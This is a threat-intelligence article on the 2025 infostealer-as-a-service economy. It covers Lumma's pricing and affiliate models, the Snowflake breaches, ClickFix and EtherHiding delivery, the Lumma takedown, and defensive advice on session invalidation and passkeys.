In the first half of 2025, infostealer malware harvested roughly 1.8 billion credentials from 5.8 million infected devices — an 800% jump over the previous six months, according to Flashpoint’s Global Threat Intelligence Index. Stolen logins now figure in 86% of breaches, and Recorded Future’s 2025 Identity Threat Landscape Report indexed 1.95 billion malware-derived credential exposures for the year, with 90% more volume in the final quarter than the first. Credential theft is no longer one technique among many. It is the supply chain.
What changed isn’t the malware itself — browser-grabbers have existed for over a decade. What changed is the business around it. Infostealer-as-a-Service turned a niche tool into a subscription product, with affiliate programs, panels, support channels, and resale markets that look more like SaaS than malware. Understanding how that economy works explains why the same names — Lumma, RedLine, Vidar, StealC — keep showing up at the front of major intrusions.
What an Infostealer Actually Steals
An infostealer is malware purpose-built to extract authentication material and sell it. On execution, a modern stealer typically completes its work in seconds: it decrypts browser-stored passwords and autofill data, lifts active session cookies, exports cryptocurrency wallet files and seed phrases, harvests SSH keys and .config directories, scrapes saved tokens from Discord, Telegram, FTP clients, and email apps, and grabs files matching keyword patterns from the desktop and Documents folders. Then it exfiltrates the bundle — a “log” — to operator infrastructure and exits, often without persisting.
Session cookies are the most consequential prize. When a user authenticates with multi-factor authentication, the service issues a session token that bypasses re-authentication on subsequent requests. A stolen cookie is a logged-in account, regardless of whether MFA is enrolled — which is why Recorded Future advises treating any infostealer exposure as a potential authentication bypass, not a password-reset trigger.
SpyCloud’s 2025 Identity Exposure Report found an average of 44 exposed credentials and 1,861 cookies per infected device. A single contractor’s compromised laptop is rarely a single-account problem.
How the Service Model Works
The shift from custom malware to managed service mirrors what ransomware went through five years ago. Lumma Stealer (also tracked as LummaC2), the most prevalent infostealer of 2024–2025 per the Microsoft Digital Defense Report 2025, is sold in tiered subscriptions: roughly $250/month for the standard build, $1,000 for premium features and custom builds, and $20,000 for source code and reseller rights. Its developer, operating under the handle “Shamel,” reportedly maintained around 400 active clients before the 2025 disruption.
In October 2025, Trend Micro documented a structural evolution: infostealer operators are now adopting affiliate models that mirror ransomware-as-a-service. Operators like the CLR Team and Roku Team recruit affiliates through Telegram bots and web panels, splitting revenue 70–80% to the affiliate and providing crypters, malware builds, hosting, and support. Initial access brokers (IABs), log parsers, and escrow services have emerged as distinct nodes in the value chain. The market continued expanding even after law enforcement took down the Cracked and Nulled marketplaces in March 2025.
Why It’s the Backbone of Intrusions
The clearest demonstration of the model is the 2024 Snowflake campaign. Mandiant identified hundreds of customer Snowflake credentials exposed via infostealers since 2020, and the threat actor it tracks as UNC5537 used those credentials — harvested by Lumma, Vidar, RedLine, Raccoon, RisePro, and MetaStealer over a multi-year window — to access roughly 165 customer tenants, including AT&T, Ticketmaster/Live Nation, and Santander. Around 80% of the compromised accounts belonging to Snowflake customers had prior credential exposure, the credentials had not been rotated, and the affected accounts lacked MFA. The earliest infostealer infection tied to a credential used in the campaign dated to November 2020.
Several of the initial infections, Mandiant noted, occurred on contractor laptops used for both work and personal activities — gaming, pirated software downloads — exactly the consumer-grade vector the IaaS model is built to exploit. The credentials sat in log markets for years before being weaponized. Snowflake didn’t get hacked. Its customers’ password reuse did.
That pattern repeats across the ransomware pipeline. Industry reporting estimates more than half of 2024–2025 ransomware victims had domain credentials surface on infostealer log marketplaces before the attack. The window from log appearance to ransomware deployment has compressed to under 48 hours in observed cases. Initial access brokers buy logs in bulk, validate them, and resell verified corporate access to ransomware affiliates. The infostealer is the front door; the ransomware crew rents the key.
Delivery: ClickFix, Malvertising, and EtherHiding
Distribution has shifted to social engineering that bypasses email filters entirely. The dominant 2024–2025 vector is ClickFix — a fake CAPTCHA, “fix-it” prompt, or browser error that instructs the victim to paste a command into Run, Terminal, or PowerShell. The user executes the malware themselves, side-stepping browser download warnings and most attachment scanning. Microsoft has documented Lumma campaigns combining ClickFix with EtherHiding, which stages payload fragments in smart contracts on Binance Smart Chain, making IP and domain blocking ineffective against the staging layer.
Other documented vectors in 2025 include malvertising via Google Ads (Microsoft’s September 2025 Crystal PDF campaign), spear-phishing impersonating Booking.com, fake CrowdStrike installer updates, and SEO-poisoned downloads. macOS users are now in scope: Microsoft Defender Experts has observed macOS targeted infostealer campaigns delivered through social engineering techniques, including ClickFix style prompts and malicious DMG downloads since late 2025, with DigitStealer, MacSync Stealer, and AMOS running fileless pipelines through curl, osascript, and AppleScript automation.
Takedowns Hurt, But Don’t Stop, the Model
In May 2025, Microsoft’s Digital Crimes Unit, the U.S. Department of Justice, the FBI, Europol, and Japan’s Cybercrime Control Center executed a coordinated disruption of Lumma. As part of the disruption announced on May 21, Microsoft’s DCU has facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that formed the backbone of the Lumma Stealer infrastructure. The DOJ seized five C2 user-panel domains; the operators stood up three replacements within 24 hours, which were then also seized.
The operation worked, briefly. Trend Micro’s telemetry showed Lumma C2 activity dipping in late May, then climbing back to baseline through June and July as operators rotated to Russia-based hosting providers like Selectel and decentralized their infrastructure further. Affiliate-driven architectures are by design hard to decapitate — every paying customer is an independent operator. The economic conclusion from Trend Micro’s 2025 analysis is blunt: as authentication hardens and password resale margins narrow, the ecosystem is professionalizing around session theft, broader identity abuse, and AI-assisted log enrichment. The model adapts faster than enforcement.
What Defenders Should Actually Do
The defensive implications follow from how the kill chain works, not from any single malware family. Three things matter most.
Treat any infostealer hit as full identity compromise. A stealer log doesn’t just contain passwords; it contains live session cookies. Password resets without session invalidation leave the attacker authenticated. Force re-authentication across SSO, IdP sessions, VPN, and SaaS for any affected user.
Close the SSO and “ghost login” gaps. The Snowflake breach worked partly because local username/password logins continued to exist alongside SSO, and MFA enforcement applied only at the IdP, not at the application. Audit for direct local logins on every SaaS tenant, enforce MFA at the application layer, and disable legacy authentication paths.
Monitor for credential exposure continuously, not quarterly. Recorded Future identified 90% more credentials in Q4 2025 than Q1. Subscribe to commercial or open-source breach-data feeds, alert on company-domain hits in stealer logs, and rotate any credential that surfaces — including those that “shouldn’t matter” because they belong to demo or test accounts.
Adopt phishing-resistant authentication. FIDO2 passkeys neutralize credential and cookie theft as an authentication bypass for the accounts they cover. Coverage is uneven across enterprise apps, but for crown-jewel systems — IdP, code repositories, cloud consoles, RMM tools — passkey enrollment is the single highest-leverage control available.
FAQ
Does MFA stop infostealers? Not the way most organizations deploy it. Stealers exfiltrate session cookies that represent already-authenticated sessions, so the attacker logs in as the post-MFA user. MFA at the IdP doesn’t help if a local SaaS login bypasses it. Phishing-resistant MFA (FIDO2/passkeys) plus session-bound tokens are what actually stop the bypass.
How is an infostealer log different from a regular data breach dump? A breach dump typically contains hashed passwords from one service. A stealer log is a full identity package from one infected device: dozens of plaintext credentials across services, plus active session cookies, autofill data, system info, crypto wallets, and sometimes file contents. One log can compromise an entire person’s digital footprint.
Is this still mostly a Windows problem? Less so. Microsoft Defender Experts documented active macOS infostealer campaigns — DigitStealer, MacSync, Atomic macOS Stealer — through late 2025 and into 2026, using fileless pipelines that bypass Gatekeeper. Python-based cross-platform stealers like PXA Stealer add Linux exposure. Treat macOS endpoints as in-scope.
What does a stolen log actually cost? Tier and freshness drive price. Bulk consumer logs sell for cents per record on Telegram markets; verified logs containing corporate VPN, RMM, or cloud-console access can fetch hundreds to thousands per access, with initial access brokers operating as middlemen between stealer operators and ransomware affiliates.
The Through-Line
Every dollar a ransomware operator earns starts somewhere upstream. Increasingly, that starting point is a $200-a-month subscription to a stealer panel and a teenage affiliate pasting a ClickFix command onto a Reddit thread. The reason credential theft has become the backbone of modern intrusions isn’t a technical breakthrough — it’s that the criminal economy figured out specialization. Stop treating infostealer hits as endpoint hygiene incidents. They’re access-broker source material, and the clock on weaponization is measured in hours.
